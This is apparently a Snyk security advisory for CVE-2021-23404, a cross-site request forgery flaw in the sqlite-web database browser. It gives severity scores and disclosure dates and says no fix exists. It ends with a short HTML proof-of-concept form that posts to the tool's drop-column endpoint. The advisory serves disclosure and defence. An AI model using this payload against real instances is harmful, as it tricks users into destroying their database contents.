Cross-site Request Forgery (CSRF) Affecting sqlite-web package, versions [0,]
Snyk CVSS
Attack Complexity
Low
User Interaction
Required
Confidentiality
High
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.13% (47th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-PYTHON-SQLITEWEB-1316324
- published 6 Sep 2021
- disclosed 9 Jul 2021
- credit Yadhu Krishna M
Introduced: 9 Jul 2021
CVE-2021-23404 Open this link in a new tabHow to fix?
There is no fixed version for sqlite-web.
Overview
sqlite-web is a Web-based SQLite database browser.
Affected versions of this package are vulnerable to Cross-site Request Forgery (CSRF). The SQL dashboard area allows sensitive actions to be performed without validating that the request originated from the application. This could enable an attacker to trick a user into performing these actions unknowingly through a Cross Site Request Forgery (CSRF) attack.
PoC
<html><form enctype="application/x-www-form-urlencoded" method="POST" action="http://your-sqlite-web-instance:8080/sss/drop-column/"><table><tr><td>name</td><td><input type="text" value="id" name="name"></td></tr>
</table><input type="submit" value="http://dvws.local:8080/sss/drop-column/"></form></html>